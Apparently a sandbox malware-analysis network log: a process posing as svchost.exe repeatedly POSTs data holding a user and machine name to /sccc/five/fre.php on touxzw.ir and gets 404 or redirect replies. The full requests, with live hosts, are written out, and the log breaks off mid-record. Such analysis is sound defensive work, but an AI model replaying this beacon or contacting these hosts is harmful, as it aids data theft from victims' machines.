Timestamp	Bytes transferred	Direction	Data
Feb 27, 2025 23:41:48.371711969 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 149 Connection: close
Feb 27, 2025 23:41:48.380354881 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 39 00 39 00 35 00 35 00 32 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones899552JONES-PC0FDD42EE188E931437F4FBE2C
Feb 27, 2025 23:41:49.139020920 CET	842	IN	HTTP/1.1 404 Not Found Date: Thu, 27 Feb 2025 22:41:49 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uw%2FDMMmNnFJ%2FS79TZFmO7KHQ%2BRWMFCz8OM5abAdq9kd4AviIgIq6Ea5FTNtmn0mQYO8ZdwcM8peFuIubVviC5R33a3RNzZJ5JW5oYO5Uno2095lIMNbvtbh5bBw%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 918baf37c85419bf-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1967&min_rtt=1967&rtt_var=983&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=209&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49754	104.21.64.1	80	2492	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 27, 2025 23:41:50.297977924 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 149 Connection: close
Feb 27, 2025 23:41:50.303138018 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 39 00 39 00 35 00 35 00 32 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones899552JONES-PC0FDD42EE188E931437F4FBE2C
Feb 27, 2025 23:41:51.103409052 CET	844	IN	HTTP/1.1 404 Not Found Date: Thu, 27 Feb 2025 22:41:51 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Kn%2BRKnqsDkO%2Fe9pDaZDmRmY55R5GICDNO6Ng92JV%2Fsimgm2r7%2BELfrCBPFmdPjfv5rWrfuXLQbuHFE4AXzPJDiAw8q3Z9ypWHHi0W4dwtsqK3cIOlLaubLuIdSE%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 918baf43de727c6a-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1956&min_rtt=1956&rtt_var=978&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=164&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	49755	104.21.64.1	80	2492	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 27, 2025 23:41:52.378026009 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 149 Connection: close
Feb 27, 2025 23:41:52.384767056 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 39 00 39 00 35 00 35 00 32 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones899552JONES-PC0FDD42EE188E931437F4FBE2C
Feb 27, 2025 23:41:53.133999109 CET	819	IN	HTTP/1.1 307 Temporary Redirect Date: Thu, 27 Feb 2025 22:41:53 GMT Connection: close Via: 1.0 middlebox Location: http://88.255.216.16/landpage?op=1&ms=http://touxzw.ir/sccc/five/fre.php cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QItp5fmJpjMgmaryzxVT20Ye3psYdoffIm10yNEtqV8A5R3hQlJQElasybbdDLbcyQYRe5zGs1UYSZOop2rYuIS%2Fb8xZ6Vj25HRvrlVfBH1O%2FxsK5DQcOA9v89g%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 918baf5108944307-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2402&min_rtt=2402&rtt_var=1201&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=220&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	49756	104.21.64.1	80	2492	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 27, 2025 23:41:54.310059071 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 149 Connection: close
Feb 27, 2025 23:41:54.315138102 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 39 00 39 00 35 00 35 00 32 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones899552JONES-PC0FDD42EE188E931437F4FBE2C
Feb 27, 2025 23:41:55.098129034 CET	846	IN	HTTP/1.1 404 Not Found Date: Thu, 27 Feb 2025 22:41:55 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lW6erRAwxZGNF0K7mnf%2Brgo5GHxeii9Ze5x7bZKQo94ZWE5%2FfN9fO9%2F0cP8uhHR%2B4C3wQpOwOi24f9OVFG%2BOhzFF1AaMuQNW7XTXxvbhG2QPqkkW3hZvjdERHWM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 918baf5cfd9442b1-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1775&min_rtt=1775&rtt_var=887&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=220&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	49757	104.21.64.1	80	2492	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 27, 2025 23:41:56.276932001 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 149 Connection: close
Feb 27, 2025 23:41:56.282079935 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 39 00 39 00 35 00 35 00 32 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones899552JONES-PC0FDD42EE188E931437F4FBE2C
Feb 27, 2025 23:41:57.023044109 CET	822	IN	HTTP/1.1 307 Temporary Redirect Date: Thu, 27 Feb 2025 22:41:56 GMT Connection: close Via: 1.0 middlebox Location: http://88.255.216.16/landpage?op=1&ms=http://touxzw.ir/sccc/five/fre.php cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=L7BWj1tQcwNVNG14il64F9cKDJfZa9UkPUhjGe7HxLq2rr26tTCaZTu34%2FfH3ZvjrfJI46Q8xc4CVMxKwxIvAbRVaUseTBh%2FsEeZ9%2BvpjLD3gZLafb%2B4iGyJqlI%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 918baf695a18439c-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1754&min_rtt=1754&rtt_var=877&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=179&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	49758	104.21.64.1	80	2492	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 27, 2025 23:41:58.148442984 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 149 Connection: close
Feb 27, 2025 23:41:58.153604031 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 39 00 39 00 35 00 35 00 32 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones899552JONES-PC0FDD42EE188E931437F4FBE2C
Feb 27, 2025 23:41:58.942468882 CET	838	IN	HTTP/1.1 404 Not Found Date: Thu, 27 Feb 2025 22:41:58 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=b2qmS8%2FSUrlCsrp2PI4NO8vi361xBAsGAb6O8HifFFWpDGmv6k1vR7iCPGsB69rqlMmNBiS3zd4pEq1x0IYdl1eP3NnnGiqf79eotV2A09Hcq1kvDWSio6Yp5SU%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 918baf750d0f41d3-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1749&min_rtt=1749&rtt_var=874&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=157&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	49759	104.21.64.1	80	2492	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 27, 2025 23:42:00.107971907 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 149 Connection: close
Feb 27, 2025 23:42:00.113162041 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 39 00 39 00 35 00 35 00 32 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones899552JONES-PC0FDD42EE188E931437F4FBE2C
Feb 27, 2025 23:42:00.874108076 CET	824	IN	HTTP/1.1 307 Temporary Redirect Date: Thu, 27 Feb 2025 22:42:00 GMT Connection: close Via: 1.0 middlebox Location: http://88.255.216.16/landpage?op=1&ms=http://touxzw.ir/sccc/five/fre.php cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5DEl9KFjXFYSyam9tzhw6jqblm9Anu5jwbLOLc8peQXjk8qTbD4YJchLyA%2B%2Byy%2F15WAyaGcrYaBCelg123W0BII6fXuzM1zGhYMYjn0pmNOtdk%2BP%2F1aMIA1tozU%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 918baf814f4f32d9-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1933&min_rtt=1933&rtt_var=966&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=195&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	49760	104.21.64.1	80	2492	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 27, 2025 23:42:02.084042072 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 149 Connection: close
Feb 27, 2025 23:42:02.089164972 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 39 00 39 00 35 00 35 00 32 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones899552JONES-PC0FDD42EE188E931437F4FBE2C
Feb 27, 2025 23:42:02.879786015 CET	849	IN	HTTP/1.1 404 Not Found Date: Thu, 27 Feb 2025 22:42:02 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VM%2FZD%2BOhAF0upqJja%2Fw6Bsh4lfixzYM4ev3TSzwq9LQ5RW8nHI2oaiDnZfPaYjokxgXneRYckVaH4XMjdCdWU2se4V127x3FX%2Fa7DrbVqJI3%2By%2FV3UoAojo8JSc%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 918baf8d8a985e61-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2252&min_rtt=2252&rtt_var=1126&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=187&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	49761	104.21.64.1	80	2492	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 27, 2025 23:42:04.023924112 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 149 Connection: close
Feb 27, 2025 23:42:04.029218912 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 39 00 39 00 35 00 35 00 32 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones899552JONES-PC0FDD42EE188E931437F4FBE2C
Feb 27, 2025 23:42:04.795308113 CET	820	IN	HTTP/1.1 307 Temporary Redirect Date: Thu, 27 Feb 2025 22:42:04 GMT Connection: close Via: 1.0 middlebox Location: http://88.255.216.16/landpage?op=1&ms=http://touxzw.ir/sccc/five/fre.php cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OQewkf6nR%2F5HOrZWkXzIcyve%2FX6Z96Fw4QuQtjkanI4UKt87KkZxX2U%2BfPcT11Icvi2IfWVlRkaykohVj8bp5NEpmrpuRJsXNfDX643P0wbVtTMjyILSZFlCvX4%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 918baf99ca0c3314-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1927&min_rtt=1927&rtt_var=963&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=221&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	49762	104.21.64.1	80	2492	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 27, 2025 23:42:05.955667019 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 149 Connection: close
Feb 27, 2025 23:42:05.961795092 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 39 00 39 00 35 00 35 00 32 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones899552JONES-PC0FDD42EE188E931437F4FBE2C
Feb 27, 2025 23:42:06.748857021 CET	838	IN	HTTP/1.1 404 Not Found Date: Thu, 27 Feb 2025 22:42:06 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AzzZqHsfbFecRHRHL1xKpV%2FkdOIH3rJqTc7XaOQHffo1GjdSc0njHL945e6OTwMQtig81O1d1XLwe4Xme7rrcyNR7Xr8KThlSZ9MXFTbrf8oJFQHlQvWoS1eAng%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 918bafa5ca780f53-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1665&min_rtt=1665&rtt_var=832&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=194&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	49764	104.21.64.1	80	2492	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 27, 2025 23:42:07.899980068 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 149 Connection: close
Feb 27, 2025 23:42:07.905333042 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 39 00 39 00 35 00 35 00 32 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones899552JONES-PC0FDD42EE188E931437F4FBE2C
Feb 27, 2025 23:42:08.632430077 CET	822	IN	HTTP/1.1 307 Temporary Redirect Date: Thu, 27 Feb 2025 22:42:08 GMT Connection: close Via: 1.0 middlebox Location: http://88.255.216.16/landpage?op=1&ms=http://touxzw.ir/sccc/five/fre.php cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FmTy0%2FTxDD97snE9bCpwktfDinCqa1nx5aRKO1bXhvAA0VRpCjqsP0Gypo4MvRJcLsrMvfqdzCwi0qjk8QyLKwmbKRPiHxtxE3MFoevZ2g7%2BVc5vImJ0L63s%2B%2Fk%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 918bafb1fc48de94-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1576&min_rtt=1576&rtt_var=788&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=209&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	49775	104.21.64.1	80	2492	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 27, 2025 23:42:09.777889013 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 149 Connection: close
Feb 27, 2025 23:42:09.784039021 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 39 00 39 00 35 00 35 00 32 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones899552JONES-PC0FDD42EE188E931437F4FBE2C
Feb 27, 2025 23:42:10.550929070 CET	846	IN	HTTP/1.1 404 Not Found Date: Thu, 27 Feb 2025 22:42:10 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NibJjZyePLoNYyQVw0xYUe5EPh2Xbx4l%2B1lV2bjJa8pPsE%2BAsV3fwJNcn%2FkQgB7sQsteKEoifBazv%2FHfqvZRqIJgaMGgXl8DR2dP0ME9IC%2FpZGjUfVtN5AzmSNU%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 918bafbd9c3d8ca8-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1979&min_rtt=1979&rtt_var=989&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=151&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	49787	104.21.64.1	80	2492	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 27, 2025 23:42:11.704489946 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 149 Connection: close
Feb 27, 2025 23:42:11.709602118 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 39 00 39 00 35 00 35 00 32 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones899552JONES-PC0FDD42EE188E931437F4FBE2C
Feb 27, 2025 23:42:12.433851004 CET	820	IN	HTTP/1.1 307 Temporary Redirect Date: Thu, 27 Feb 2025 22:42:12 GMT Connection: close Via: 1.0 middlebox Location: http://88.255.216.16/landpage?op=1&ms=http://touxzw.ir/sccc/five/fre.php cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=n3Wv308X%2BNaBibR%2FrdIKHwtcRdLOmGWhTU5%2F0sTA9D5S3HTCuzA2k4dvp0PuaMxdAUu9evUSyb6u7iCo70r22bi8DVOcCyarEJLeFsnAD2F46uRKewaTSns4CLw%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 918bafc9b934429e-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1696&min_rtt=1696&rtt_var=848&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=218&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.4	49801	104.21.64.1	80	2492	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 27, 2025 23:42:13.638946056 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 149 Connection: close
Feb 27, 2025 23:42:13.644259930 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 39 00 39 00 35 00 35 00 32 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones899552JONES-PC0FDD42EE188E931437F4FBE2C
Feb 27, 2025 23:42:14.369138956 CET	819	IN	HTTP/1.1 307 Temporary Redirect Date: Thu, 27 Feb 2025 22:42:14 GMT Connection: close Via: 1.0 middlebox Location: http://88.255.216.16/landpage?op=1&ms=http://touxzw.ir/sccc/five/fre.php cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SBzGreUBIr8BzKRh2hj3wJ0SM7b3TstDAsGSIEjFlIk08T%2BRIlCidTOdV2YwowE6GSUfS5OPuWUWgOuoKqE2fKDO32DC9N5oXkxA9HqM8v9R%2F6a3o1SakoJpT9o%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 918bafd5cb4a7d00-EWR alt-svc: h3=":443"; ma=86400 server-timing: 